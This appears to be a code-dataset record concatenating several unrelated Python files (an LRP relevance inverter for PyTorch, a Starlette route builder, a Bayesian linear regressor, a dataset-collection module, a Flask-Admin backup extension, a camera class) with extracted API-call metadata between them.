((1587, 1602), 'random.random', 'random.random', ([], {}), '()\n', (1600, 1602), False, 'import random\n')]
|
# trunk-ignore(black-py)
import torch
from torch.nn import Conv1d, Conv2d, Conv3d, MaxPool1d, MaxPool2d, MaxPool3d, Linear, Upsample
from lrp.utils import Flatten
from inverter_util import ( upsample_inverse, max_pool_nd_inverse,
max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook,
upsample_fwd_hook, silent_pass )
FWD_HOOK = { torch.nn.MaxPool1d : max_pool_nd_fwd_hook,
torch.nn.MaxPool2d : max_pool_nd_fwd_hook,
torch.nn.MaxPool3d : max_pool_nd_fwd_hook,
torch.nn.Conv1d : conv_nd_fwd_hook,
torch.nn.Conv2d : conv_nd_fwd_hook,
torch.nn.Conv3d : conv_nd_fwd_hook,
torch.nn.Linear : linear_fwd_hook,
torch.nn.Upsample : upsample_fwd_hook,
torch.nn.BatchNorm1d : silent_pass,
torch.nn.BatchNorm2d : silent_pass,
torch.nn.BatchNorm3d : silent_pass,
torch.nn.ReLU : silent_pass,
torch.nn.modules.activation.ReLU : silent_pass,
torch.nn.ELU : silent_pass,
Flatten : silent_pass,
torch.nn.Dropout : silent_pass,
torch.nn.Dropout2d : silent_pass,
torch.nn.Dropout3d : silent_pass,
torch.nn.Softmax : silent_pass,
torch.nn.LogSoftmax : silent_pass,
torch.nn.Sigmoid : silent_pass,
torch.nn.SiLU : conv_nd_fwd_hook }
# Rule-independant inversion functions
IDENTITY_MAPPINGS = ( torch.nn.BatchNorm1d,
torch.nn.BatchNorm2d,
torch.nn.BatchNorm3d,
torch.nn.ReLU,
torch.nn.modules.activation.ReLU,
torch.nn.ELU,
Flatten,
torch.nn.Dropout,
torch.nn.Dropout2d,
torch.nn.Dropout3d,
torch.nn.Softmax,
torch.nn.LogSoftmax,
torch.nn.Sigmoid,
torch.nn.SiLU )
def module_tracker(fwd_hook_func):
"""
Wrapper for tracking the layers throughout the forward pass.
Arguments
---------
fwd_hook_func : function
Forward hook function to be wrapped.
Returns
-------
function :
Wrapped hook function
"""
def hook_wrapper(layer, *args):
return fwd_hook_func(layer, *args)
return hook_wrapper
class Inverter(torch.nn.Module):
"""
Class for computing the relevance propagation and supplying the necessary forward hooks for all layers.
Attributes
----------
linear_rule : LinearRule
Propagation rule to use for linear layers
conv_rule : ConvRule
Propagation rule for convolutional layers
pass_not_implemented : bool
Silent pass layers that have no registered forward hooks
device : torch.device
Device to put relevance data
Methods
-------
    invert(layer, relevance, **kwargs)
        Propagates incoming relevance for the specified layer, applying any
        necessary inversion functions along the way.
"""
# Implemented rules for relevance propagation.
def __init__(self, linear_rule=None, conv_rule=None, pass_not_implemented=False,
device=torch.device('cpu'),):
self.device = device
self.warned_log_softmax = False
self.linear_rule = linear_rule
self.conv_rule = conv_rule
self.fwd_hooks = FWD_HOOK
self.inv_funcs= {}
self.pass_not_implemented = pass_not_implemented
self.module_list = []
def register_fwd_hook(self, module, fwd_hook):
"""
Register forward hook function to module.
"""
if module in self.fwd_hooks.keys():
print('Warning: Replacing previous fwd hook registered for {}'.
format(module))
self.fwd_hooks[module] = fwd_hook
def register_inv_func(self, module, inv_func):
"""
Register inverse function to module.
"""
if module in self.inv_funcs.keys():
print('Warning: Replacing previous inverse registered for {}'.
format(module))
self.inv_funcs[module] = inv_func
def get_layer_fwd_hook(self, layer) :
"""
Interface for getting any layer's forward hook
"""
try :
return self.fwd_hooks[type(layer)]
except :
if self.pass_not_implemented :
return silent_pass
raise \
NotImplementedError('Forward hook for layer type \"{}\" not implemented'.
format(type(layer)))
def invert(self, layer : torch.nn.Module, relevance : torch.Tensor, **kwargs) -> torch.Tensor :
"""
This method computes the backward pass for the incoming relevance
for the specified layer.
Arguments
---------
layer : torch.nn.Module
Layer to propagate relevance through. Can be Conv1d, Conv2d or
any combination thereof in a higher level module.
relevance : torch.Tensor
Incoming relevance from higher up in the network.
Returns
------
torch.Tensor :
Redistributed relevance going to the lower layers in the network.
"""
if isinstance(layer, (Conv1d, Conv2d, Conv3d)):
if self.conv_rule is None :
raise Exception('Model contains conv layers but the conv rule was not set !')
return self.conv_rule(layer, relevance, **kwargs)
elif isinstance(layer, (MaxPool1d, MaxPool2d, MaxPool3d)):
return max_pool_nd_inverse(layer, relevance)
elif isinstance(layer, Linear) :
if self.linear_rule is None :
raise Exception('Model contains linear layers but the linear rule was not set !')
return self.linear_rule(layer, relevance.tensor, **kwargs)
elif isinstance(layer, Upsample):
return upsample_inverse(layer, relevance)
elif isinstance(layer, torch.nn.modules.container.Sequential):
for l in layer[::-1] :
relevance = self.invert(l, relevance)
return relevance
elif type(layer) in IDENTITY_MAPPINGS :
return relevance
elif hasattr(layer, 'propagate'):
return layer.propagate(self, relevance)
else :
try :
return self.inv_funcs[type(layer)](self, layer, relevance, **kwargs)
except KeyError :
raise NotImplementedError(f'Relevance propagation not implemented for layer type {type(layer)}')
def __call__(self, layer : torch.nn.Module, relevance : torch.Tensor, **kwargs) -> torch.Tensor :
""" Wrapper for invert method """
return self.invert(layer, relevance, **kwargs)
|
[
"inverter_util.upsample_inverse",
"inverter_util.max_pool_nd_inverse",
"torch.device"
] |
[((3319, 3338), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3331, 3338), False, 'import torch\n'), ((5821, 5858), 'inverter_util.max_pool_nd_inverse', 'max_pool_nd_inverse', (['layer', 'relevance'], {}), '(layer, relevance)\n', (5840, 5858), False, 'from inverter_util import upsample_inverse, max_pool_nd_inverse, max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook, upsample_fwd_hook, silent_pass\n'), ((6172, 6206), 'inverter_util.upsample_inverse', 'upsample_inverse', (['layer', 'relevance'], {}), '(layer, relevance)\n', (6188, 6206), False, 'from inverter_util import upsample_inverse, max_pool_nd_inverse, max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook, upsample_fwd_hook, silent_pass\n')]
|
"""
Module to take in a directory, iterate through it and create a Starlette routing map.
"""
import importlib
import inspect
from pathlib import Path
from typing import Union
from starlette.routing import Route as StarletteRoute, Mount
from nested_dict import nested_dict
from admin.route import Route
def construct_route_map_from_dict(route_dict: dict):
route_map = []
for mount, item in route_dict.items():
if inspect.isclass(item):
route_map.append(StarletteRoute(mount, item))
else:
route_map.append(Mount(mount, routes=construct_route_map_from_dict(item)))
return route_map
def create_route_map():
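    """Walk admin/routes for Python modules and build a nested Starlette route map from their Route subclasses."""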
routes_directory = Path("admin") / "routes"
route_dict = nested_dict()
for file in routes_directory.rglob("*.py"):
import_name = f"{str(file.parent).replace('/', '.')}.{file.stem}"
route = importlib.import_module(import_name)
for _member_name, member in inspect.getmembers(route):
if inspect.isclass(member):
if issubclass(member, Route) and member != Route:
member.check_parameters()
levels = str(file.parent).split("/")[2:]
current_level = None
for level in levels:
if current_level is None:
current_level = route_dict[f"/{level}"]
else:
current_level = current_level[f"/{level}"]
if current_level is not None:
current_level[member.path] = member
else:
route_dict[member.path] = member
route_map = construct_route_map_from_dict(route_dict.to_dict())
return route_map
|
[
"importlib.import_module",
"inspect.isclass",
"nested_dict.nested_dict",
"pathlib.Path",
"starlette.routing.Route",
"inspect.getmembers"
] |
[((728, 741), 'nested_dict.nested_dict', 'nested_dict', ([], {}), '()\n', (739, 741), False, 'from nested_dict import nested_dict\n'), ((433, 454), 'inspect.isclass', 'inspect.isclass', (['item'], {}), '(item)\n', (448, 454), False, 'import inspect\n'), ((685, 698), 'pathlib.Path', 'Path', (['"""admin"""'], {}), "('admin')\n", (689, 698), False, 'from pathlib import Path\n'), ((894, 930), 'importlib.import_module', 'importlib.import_module', (['import_name'], {}), '(import_name)\n', (917, 930), False, 'import importlib\n'), ((976, 1001), 'inspect.getmembers', 'inspect.getmembers', (['route'], {}), '(route)\n', (994, 1001), False, 'import inspect\n'), ((1018, 1041), 'inspect.isclass', 'inspect.isclass', (['member'], {}), '(member)\n', (1033, 1041), False, 'import inspect\n'), ((485, 512), 'starlette.routing.Route', 'StarletteRoute', (['mount', 'item'], {}), '(mount, item)\n', (499, 512), True, 'from starlette.routing import Route as StarletteRoute, Mount\n')]
|
import numpy as np
class BayesLinearRegressor:
def __init__(self, number_of_features, alpha=1e6):
'''
:param number_of_features: Integer number of features in the training rows, excluding the intercept and output values
:param alpha: Float inverse ridge regularizaiton constant, set to 1e6
'''
# alpha is our initial guess on the variance, basically, all parameters initialized to 0 with alpha variance
# so, you know, just set it super-high. This is the same as L2 regularization, btw!
# all those weird Bayesian update rules actually amount to very standard linear algebra identities
# Once you see that it's just updating the moment matrix and the sum of squared residuals, it's straightforward!
# So those are our internal variables that everything else depends upon
self.number_of_features = number_of_features
self.alpha = alpha
self.beta_means = np.array([0] * (number_of_features + 1), dtype=np.float) # + 1 for the intercept
self.number_of_updates = 0
self.residual_sum_squares = 0
self.moment_matrix = np.eye(number_of_features + 2) * 0.0 # + 2 for the intercept and the output
self.regularization_matrix = np.eye(self.number_of_features + 1) / self.alpha
self.regularization_matrix[0, 0] = 0 # we don't regularize the intercept term
def partial_fit(self, X, Y, W=None, reverse=False):
'''
The online updating rules
:param X: Input feature vector(s) as 2D numpy array
:param Y: Input output values as 1D numpy array
:param W: Data weights (relative to unity) as a 1D numpy array
:param reverse: Boolean, True means that we "unfit" the training rows, otherwise acts as normal
:return: None
'''
# see http://www.biostat.umn.edu/~ph7440/pubh7440/BayesianLinearModelGoryDetails.pdf for gory details
# clear the frozen parameter sample since we are updating the parameter distributions
self.frozen_parameter_sample = None
moment_of_X_before = self.moment_matrix[:-1, :-1]
beta_means_before = self.beta_means.copy()
inverted_covariance_matrix_before = moment_of_X_before + self.regularization_matrix
# Here we concatenate the intercept input value (constant 1), the input vector, and the output value:
rank_n_obs_update_matrix = np.array([[1] + row + output for row, output in zip(X.tolist(), Y.tolist())])
if W is None:
moment_matrix_update_term = rank_n_obs_update_matrix.T @ rank_n_obs_update_matrix
else:
moment_matrix_update_term = rank_n_obs_update_matrix.T @ np.diag(W.tolist()) @ rank_n_obs_update_matrix
if not reverse:
self.moment_matrix += moment_matrix_update_term
moment_of_Y_update_term = Y.T @ Y
self.number_of_updates += 1
else:
self.moment_matrix -= moment_matrix_update_term
moment_of_Y_update_term = -Y.T @ Y
self.number_of_updates -= 1
moment_of_X = self.moment_matrix[:-1, :-1]
moment_of_X_and_Y = self.moment_matrix[:-1, -1]
moment_of_X_and_Y_update_term = moment_matrix_update_term[:-1, -1]
inverted_covariance_matrix = moment_of_X + self.regularization_matrix
covariance_matrix = np.linalg.inv(inverted_covariance_matrix)
# these two statements are equivalent, so I choose the simpler one, although the latter
# one is more consistent with the notation I come across in the literature
self.beta_means = covariance_matrix @ (moment_of_X_and_Y)
# self.beta_means = covariance_matrix @ (inverted_covariance_matrix_before @ beta_means_before + moment_of_X_and_Y_update_term)
if self.number_of_updates > len(covariance_matrix) - 1:
self.residual_sum_squares += (
moment_of_Y_update_term -
self.beta_means.T @ inverted_covariance_matrix @ self.beta_means +
beta_means_before.T @ inverted_covariance_matrix_before @ beta_means_before
)
def partial_unfit(self, X, Y):
return self.partial_fit(X, Y, reverse=True)
def predict(self, X, use_means=False, freeze_parameter_sample=False):
'''
:param X: Input feature vector excluding the intercept constant as a 2D numpy array
        :param use_means: Boolean where True means we just provide the prediction at the mean of the coefficients
        (sometimes referred to as deterministic prediction); otherwise sample parameters from the multivariate normal
and incorporate the uncertainty of the parameters in your prediction
:param freeze_parameter_sample: Boolean. When set to True, we sample from the parameters only once for each prediction
:return:
'''
X_with_intercept = np.array([[1] + row.tolist() for row in X])
scale_multiplier = 1.0 / max(1.0, (self.number_of_updates - self.number_of_features - 1))
if use_means:
return X_with_intercept @ self.beta_means
else:
if freeze_parameter_sample:
                if self.frozen_parameter_sample is None:
                    self.frozen_parameter_sample = np.random.multivariate_normal(
                        self.beta_means.T[0],
                        self.residual_sum_squares * scale_multiplier * self.cov_params
)
beta = self.frozen_parameter_sample
else:
beta = np.random.multivariate_normal(
self.beta_means.T[0],
self.residual_sum_squares * scale_multiplier * self.cov_params
)
return X_with_intercept @ beta
@property
def coef_(self):
return self.beta_means[1:]
@property
def intercept_(self):
return float(self.beta_means[0])
@property
def cov_params(self):
scale_multiplier = 1.0 / max(1.0, (self.number_of_updates - self.number_of_features - 1))
moment_of_X = self.moment_matrix[:-1, :-1]
inverted_covariance_matrix = moment_of_X + np.eye(self.number_of_features + 1) / self.alpha
return np.linalg.inv(inverted_covariance_matrix) * self.residual_sum_squares * scale_multiplier
|
[
"numpy.eye",
"numpy.linalg.inv",
"numpy.array",
"numpy.random.multivariate_normal"
] |
[((965, 1021), 'numpy.array', 'np.array', (['([0] * (number_of_features + 1))'], {'dtype': 'np.float'}), '([0] * (number_of_features + 1), dtype=np.float)\n', (973, 1021), True, 'import numpy as np\n'), ((3376, 3417), 'numpy.linalg.inv', 'np.linalg.inv', (['inverted_covariance_matrix'], {}), '(inverted_covariance_matrix)\n', (3389, 3417), True, 'import numpy as np\n'), ((1149, 1179), 'numpy.eye', 'np.eye', (['(number_of_features + 2)'], {}), '(number_of_features + 2)\n', (1155, 1179), True, 'import numpy as np\n'), ((1263, 1298), 'numpy.eye', 'np.eye', (['(self.number_of_features + 1)'], {}), '(self.number_of_features + 1)\n', (1269, 1298), True, 'import numpy as np\n'), ((5578, 5698), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['self.beta_means.T[0]', '(self.residual_sum_squares * scale_multiplier * self.cov_params)'], {}), '(self.beta_means.T[0], self.\n residual_sum_squares * scale_multiplier * self.cov_params)\n', (5607, 5698), True, 'import numpy as np\n'), ((6189, 6224), 'numpy.eye', 'np.eye', (['(self.number_of_features + 1)'], {}), '(self.number_of_features + 1)\n', (6195, 6224), True, 'import numpy as np\n'), ((6253, 6294), 'numpy.linalg.inv', 'np.linalg.inv', (['inverted_covariance_matrix'], {}), '(inverted_covariance_matrix)\n', (6266, 6294), True, 'import numpy as np\n'), ((5306, 5419), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['self.beta_means.T[0]', '(self.residual_sum_squares * scale_multiplier * self.cov)'], {}), '(self.beta_means.T[0], self.\n residual_sum_squares * scale_multiplier * self.cov)\n', (5335, 5419), True, 'import numpy as np\n')]
|
import copy
import json
import jsonschema
import logging
import pandas as pd
import os
from sklearn.cross_validation import train_test_split
import minst.utils as utils
logger = logging.getLogger(__name__)
class MissingDataException(Exception):
pass
class Observation(object):
"""Document model each item in the collection."""
# This should use package resources :o(
SCHEMA_PATH = os.path.join(os.path.dirname(__file__), 'schema',
'observation.json')
SCHEMA = json.load(open(SCHEMA_PATH))
def __init__(self, index, dataset, audio_file, instrument, source_index,
start_time, duration, note_number=None, dynamic='',
partition=''):
"""Model definition for an instrument observation.
Parameters
----------
index :
dataset :
audio_file : str
Relative file path to an audiofile.
instrument :
source_index :
start_time :
duration :
note_number :
dynamic :
partition :
Returns
-------
obs : Observation
Populated observation
"""
self.index = index
self.dataset = dataset
self.audio_file = audio_file
self.instrument = instrument
self.source_index = source_index
self.start_time = start_time
self.duration = duration
self.note_number = note_number
self.dynamic = dynamic
self.partition = partition
def to_builtin(self):
return self.__dict__.copy()
@classmethod
def from_series(cls, series):
"""Convert a pd.Series to an Observation."""
return cls(index=series.name, **series.to_dict())
def to_series(self):
"""Convert to a flat series (ie make features a column)
Returns
-------
pandas.Series
"""
flat_dict = self.to_dict()
name = flat_dict.pop("index")
return pd.Series(data=flat_dict, name=name)
def to_dict(self):
return self.__dict__.copy()
def __getitem__(self, key):
return self.__dict__[key]
def validate(self, schema=None, verbose=False, check_files=True):
"""Returns True if valid.
"""
schema = self.SCHEMA if schema is None else schema
success = True
try:
jsonschema.validate(self.to_builtin(), schema)
except jsonschema.ValidationError as derp:
success = False
if verbose:
print("Failed schema test: \n{}".format(derp))
if success and check_files:
success &= utils.check_audio_file(self.audio_file)[0]
if not success and verbose:
print("Failed file check: \n{}".format(self.audio_file))
return success
def _enforce_obs(obs, audio_root='', strict=True):
"""Get dict from an Observation if an observation, else just dict"""
audio_file = obs['audio_file']
escaped_audio_file = os.path.join(audio_root, audio_file)
file_checks = [os.path.exists(audio_file),
os.path.exists(escaped_audio_file)]
if not any(file_checks) and strict:
raise MissingDataException(
"Audio file(s) missing:\n\tbase: {}\n\tescaped:{}"
"".format(audio_file, escaped_audio_file))
if isinstance(obs, Observation):
obs = obs.to_dict()
obs['audio_file'] = escaped_audio_file if file_checks[1] else audio_file
return obs
class Collection(object):
"""Dictionary-like collection of Observations (maintains order).
Expands relative audio files to a given `audio_root` path.
"""
# MODEL = Observation
def __init__(self, observations, audio_root='', strict=False):
"""
Parameters
----------
observations : list
List of Observations (as dicts or Observations.)
If they're dicts, this will convert them to Observations.
data_root : str or None
Path to look for an observation, if not None
"""
self._observations = [Observation(**_enforce_obs(x, audio_root,
strict))
for x in observations]
self.audio_root = audio_root
self.strict = strict
def __eq__(self, a):
is_eq = False
if hasattr(a, 'to_builtin'):
is_eq = self.to_builtin() == a.to_builtin()
return is_eq
def __len__(self):
return len(self.values())
def __getitem__(self, n):
"""Return the observation for a given integer index."""
return self._observations[n]
def items(self):
return [(v.index, v) for v in self.values()]
def values(self):
return self._observations
def keys(self):
return [v.index for v in self.values()]
def append(self, observation, audio_root=None):
audio_root = self.audio_root if audio_root is None else audio_root
obs = _enforce_obs(observation, audio_root, self.strict)
self._observations += [Observation(**obs)]
def to_builtin(self):
return [v.to_builtin() for v in self.values()]
@classmethod
def read_json(cls, json_path, audio_root=''):
with open(json_path, 'r') as fh:
return cls(json.load(fh), audio_root=audio_root)
def to_json(self, json_path=None, **kwargs):
"""Pandas-like `to_json` method.
Parameters
----------
json_path : str, or None
If given, will attempt to write JSON to disk; else returns a string
of serialized data.
**kwargs : keyword args
Pass-through parameters to the JSON serializer.
"""
sdata = json.dumps(self.to_builtin(), **kwargs)
if json_path is not None:
with open(json_path, 'w') as fh:
fh.write(sdata)
else:
return sdata
def validate(self, verbose=False, check_files=True):
"""Returns True if all are valid."""
return all([x.validate(verbose=verbose, check_files=check_files)
for x in self.values()])
def to_dataframe(self):
return pd.DataFrame([x.to_series() for x in self.values()])
@classmethod
def from_dataframe(cls, dframe, audio_root=''):
return cls([Observation.from_series(x) for _, x in dframe.iterrows()],
audio_root=audio_root)
def copy(self, deep=True):
return Collection(copy.deepcopy(self._observations))
def view(self, column, filter_value):
"""Returns a copy of the collection restricted to the filter value.
Parameters
----------
column : str
Name of the column for filtering.
filter_value : obj
Value to restrict the collection.
        Returns
        -------
        Collection
            A new Collection containing only the rows where `column` equals `filter_value`.
        """
thecopy = copy.copy(self.to_dataframe())
ds_view = thecopy[thecopy[column] == filter_value]
return Collection.from_dataframe(ds_view, self.audio_root)
def load(filename, audio_root):
"""
"""
return Collection.load(filename)
def partition_collection(collection, test_set, train_val_split=0.2,
max_files_per_class=None):
"""Returns Datasets for train and validation constructed
from the datasets not in the test_set, and split with
the ratio train_val_split.
* First selects from only the datasets given in datasets.
* Then **for each instrument** (so the distribution from
each instrument doesn't change)
* train_test_split to generate training and validation sets.
* if max_files_per_class, also then restrict the training set to
a maximum of that number of files for each train and test
Parameters
----------
test_set : str
String in ["rwc", "uiowa", "philharmonia"] which selects
the hold-out-set to be used for testing.
Returns
-------
partition_df : pd.DataFrame
DataFrame with only an index to the original table, and
the partiition in ['train', 'valid', 'test']
"""
df = collection.to_dataframe()
test_df = collection.view(
column='dataset', filter_value=test_set).to_dataframe()
datasets = set(df["dataset"].unique()) - set([test_set])
search_df = df[df["dataset"].isin(datasets)]
selected_instruments_train = []
selected_instruments_valid = []
for instrument in search_df["instrument"].unique():
instrument_df = search_df[search_df["instrument"] == instrument]
if len(instrument_df) < 2:
logger.warning("Instrument {} doesn't haven enough samples "
"to split.".format(instrument))
continue
groups = instrument_df.groupby(['source_index'])
train_grps, valid_grps = train_test_split(
list(groups), test_size=train_val_split)
# Groups get backed out as (source_index, dataframe) tuples, so stick
# these back together now that they've been partitioned.
traindf = pd.concat(x[1] for x in train_grps)
validdf = pd.concat(x[1] for x in valid_grps)
if max_files_per_class:
replace = False if len(traindf) > max_files_per_class else True
traindf = traindf.sample(n=max_files_per_class,
replace=replace)
selected_instruments_train.append(traindf)
selected_instruments_valid.append(validdf)
train_df = pd.concat(selected_instruments_train)
valid_df = pd.concat(selected_instruments_valid)
# Create the final dataframe
partition = (['train'] * len(train_df) +
['valid'] * len(valid_df) +
['test'] * len(test_df))
index = (train_df.index.tolist() +
valid_df.index.tolist() +
test_df.index.tolist())
result = pd.DataFrame(partition,
columns=['partition'],
index=index)
return result
|
[
"pandas.DataFrame",
"copy.deepcopy",
"json.load",
"os.path.dirname",
"os.path.exists",
"minst.utils.check_audio_file",
"pandas.Series",
"os.path.join",
"pandas.concat",
"logging.getLogger"
] |
[((180, 207), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (197, 207), False, 'import logging\n'), ((3034, 3070), 'os.path.join', 'os.path.join', (['audio_root', 'audio_file'], {}), '(audio_root, audio_file)\n', (3046, 3070), False, 'import os\n'), ((9584, 9621), 'pandas.concat', 'pd.concat', (['selected_instruments_train'], {}), '(selected_instruments_train)\n', (9593, 9621), True, 'import pandas as pd\n'), ((9637, 9674), 'pandas.concat', 'pd.concat', (['selected_instruments_valid'], {}), '(selected_instruments_valid)\n', (9646, 9674), True, 'import pandas as pd\n'), ((9971, 10030), 'pandas.DataFrame', 'pd.DataFrame', (['partition'], {'columns': "['partition']", 'index': 'index'}), "(partition, columns=['partition'], index=index)\n", (9983, 10030), True, 'import pandas as pd\n'), ((417, 442), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (432, 442), False, 'import os\n'), ((2008, 2044), 'pandas.Series', 'pd.Series', ([], {'data': 'flat_dict', 'name': 'name'}), '(data=flat_dict, name=name)\n', (2017, 2044), True, 'import pandas as pd\n'), ((3090, 3116), 'os.path.exists', 'os.path.exists', (['audio_file'], {}), '(audio_file)\n', (3104, 3116), False, 'import os\n'), ((3137, 3171), 'os.path.exists', 'os.path.exists', (['escaped_audio_file'], {}), '(escaped_audio_file)\n', (3151, 3171), False, 'import os\n'), ((9152, 9187), 'pandas.concat', 'pd.concat', (['(x[1] for x in train_grps)'], {}), '(x[1] for x in train_grps)\n', (9161, 9187), True, 'import pandas as pd\n'), ((9206, 9241), 'pandas.concat', 'pd.concat', (['(x[1] for x in valid_grps)'], {}), '(x[1] for x in valid_grps)\n', (9215, 9241), True, 'import pandas as pd\n'), ((6558, 6591), 'copy.deepcopy', 'copy.deepcopy', (['self._observations'], {}), '(self._observations)\n', (6571, 6591), False, 'import copy\n'), ((2668, 2707), 'minst.utils.check_audio_file', 'utils.check_audio_file', (['self.audio_file'], {}), '(self.audio_file)\n', (2690, 2707), True, 'import minst.utils as utils\n'), ((5367, 5380), 'json.load', 'json.load', (['fh'], {}), '(fh)\n', (5376, 5380), False, 'import json\n')]
|
from pathlib import Path
from docs_src.importers.hfml.tutorial001 import result
def test_hfml_base():
output_fn = Path("tests") / "formatters" / "hfml" / "data" / "kangyur_base.txt"
expected = output_fn.read_text()
assert result == expected
|
[
"pathlib.Path"
] |
[((121, 134), 'pathlib.Path', 'Path', (['"""tests"""'], {}), "('tests')\n", (125, 134), False, 'from pathlib import Path\n')]
|
import array as arr
import pytz
# Owned
__project__ = "peimar"
__author__ = "<NAME>"
__license__ = "MIT"
__version__ = "0.0.4"
__date__ = "02/11/2021"
__email__ = "<<EMAIL>>"
# Inverter Web Server
inverter_server = "192.168.1.8"
inverter_port = 80
# Inverter metric decimals
cf = arr.array('I', [0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2, 1, 2, 1, 2, 1, 2, 1, 1, 1])
# Inverter timezone
timezone = pytz.timezone("Europe/Rome")
# Production time slot
start_hour = '07'
start_minute = '30'
end_hour = '19'
end_minute = '00'
dst_start_hour = '06'
dst_start_minute = '00'
dst_end_hour = '21'
dst_end_minute = '30'
# InfluxDB Connection
influxdb_host = "localhost"
influxdb_port = 8086
influxdb_repo = "peimar"
influxdb_user = "peimar"
influxdb_pwd = "<PASSWORD>"
# Log path
logdefaultpath = "/var/log/peimar/default.log"
loginfopath = "/var/log/peimar/info.log"
|
[
"array.array",
"pytz.timezone"
] |
[((284, 406), 'array.array', 'arr.array', (['"""I"""', '[0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0, 2,\n 1, 2, 1, 2, 1, 2, 1, 1, 1]'], {}), "('I', [0, 2, 1, 2, 1, 1, 2, 1, 2, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,\n 2, 2, 2, 0, 2, 1, 2, 1, 2, 1, 2, 1, 1, 1])\n", (293, 406), True, 'import array as arr\n'), ((435, 463), 'pytz.timezone', 'pytz.timezone', (['"""Europe/Rome"""'], {}), "('Europe/Rome')\n", (448, 463), False, 'import pytz\n')]
|
import os
from sqlalchemy.exc import IntegrityError, InvalidRequestError
from .backup import Backup
from .serializer import Serializer
from .autoclean import BackupAutoClean
from .mixins import AdminBackupModelViewMixin
from .fileadmin import BackupFileAdmin
class FlaskAdminBackup:
def __init__(self, app=None, db=None, admin=None):
if app is not None:
self.init_app(app)
def init_app(self, app, db=None, admin=None, backup=None, serializer=None):
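        """Attach the extension to the Flask app, set backup config defaults and optionally register the backup file view."""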
if not hasattr(app, 'extensions'):
app.extensions = {}
app.extensions['flask-admin-backup'] = self
app.config.setdefault('ADMIN_BACKUP_FOLDER_NAME', 'databackup')
app.config.setdefault('ADMIN_BACKUP_PATH', os.getcwd())
app.config.setdefault('ADMIN_BACKUP_PREFIX', 'db-bkp')
app.config.setdefault('ADMIN_BACKUP_FILEADMIN_NAME', 'Backup')
self.app = app
self.db = db
self.fileadmin_name = self.app.config['ADMIN_BACKUP_FILEADMIN_NAME']
self.prefix = self.app.config['ADMIN_BACKUP_PREFIX']
self.folder_path = os.path.join(
self.app.config['ADMIN_BACKUP_PATH'],
self.app.config['ADMIN_BACKUP_FOLDER_NAME'])
self.backup = backup or Backup(
path=self.folder_path, prefix=self.prefix)
self.target = self.backup.get_target()
self.serializer = serializer or Serializer(db=db)
if admin:
self.add_file_view(admin)
def add_file_view(self, admin):
admin.add_view(BackupFileAdmin(
self.folder_path,
name=self.fileadmin_name))
def create(self, class_name, contents):
"""备份数据
:param class_name: str,
:param contents: list,
:return: bool
"""
data = self.serializer.dump_data(contents)
        filename = self.backup.generate_name(class_name) # generate the backup file name
full_path = self.target.create_file(filename, data)
rows = len(self.serializer.load_data(data))
if full_path:
print('==> {} rows from {} saved as {}'.format(
rows, class_name, full_path))
return True
else:
print('==> Error creating {} at {}'.format(
filename, self.target.path))
return False
def restore(self, path):
"""恢复数据
:param path: 备份文件路径
"""
contents = self.target.read_file(path)
successes = []
fails = []
db = self.db
rows = self.serializer.load_data(contents)
for row in rows:
try:
                db.session.merge(row) # uses db.session.merge
                db.session.commit() # could this be replaced with flush?
successes.append(row)
except (IntegrityError, InvalidRequestError):
db.session.rollback()
fails.append(row)
return successes, fails
def autoclean(self):
"""
Remove a series of backup files based on the following rules:
* Keeps all the backups from the last 7 days
* Keeps the most recent backup from each week of the last month
* Keeps the most recent backup from each month of the last year
* Keeps the most recent backup from each year of the remaining years
"""
backup = self.backup
backup.files = tuple(backup.target.get_files())
if not backup.files:
print('==> No backups found.')
return None
cleaning = BackupAutoClean(backup.get_timestamps())
white_list = cleaning.white_list
black_list = cleaning.black_list
if not black_list:
print('==> No backup to be deleted.')
return None
|
[
"os.getcwd",
"os.path.join"
] |
[((1090, 1190), 'os.path.join', 'os.path.join', (["self.app.config['ADMIN_BACKUP_PATH']", "self.app.config['ADMIN_BACKUP_FOLDER_NAME']"], {}), "(self.app.config['ADMIN_BACKUP_PATH'], self.app.config[\n 'ADMIN_BACKUP_FOLDER_NAME'])\n", (1102, 1190), False, 'import os\n'), ((733, 744), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (742, 744), False, 'import os\n')]
|
import numpy as np
class Camera(object):
"""Camera is a simple finite pinhole camera defined by the matrices K, R
and t.
see "Multiple View Geometry in Computer Vision" by <NAME> and <NAME> for notation.
Parameters
----------
K: The 3x3 intrinsic camera parameters
R: The 3x3 rotation matrix from world to camera coordinates
t: The 3x1 translation vector for the camera center in camera coordinates
(so that the camera center is the origin in the camera coordinates)
"""
def __init__(self, K, R, t):
# Make sure the input data have the right shape
assert K.shape == (3, 3)
assert R.shape == (3, 3)
assert t.shape == (3, 1)
self._K = K
self._R = R
self._t = t
self._P = None
self._P_pinv = None
self._center = None
@property
def K(self):
return self._K
@property
def R(self):
return self._R
@property
def t(self):
return self._t
@property
def center(self):
        # Compute the center of the camera in homogeneous coordinates and return
# it as a 4x1 vector
if self._center is None:
self._center = np.vstack(
[(-np.linalg.inv(self.R)).dot(self.t), [1]]
).astype(np.float32)
assert self._center.shape == (4, 1)
return self._center
@property
def P(self):
# Compute and return a 3x4 projection matrix
if self._P is None:
self._P = self._K.dot(np.hstack([self._R, self._t]))
return self._P
@property
def P_pinv(self):
if self._P_pinv is None:
self._P_pinv = np.linalg.pinv(self.P)
return self._P_pinv
|
[
"numpy.linalg.inv",
"numpy.linalg.pinv",
"numpy.hstack"
] |
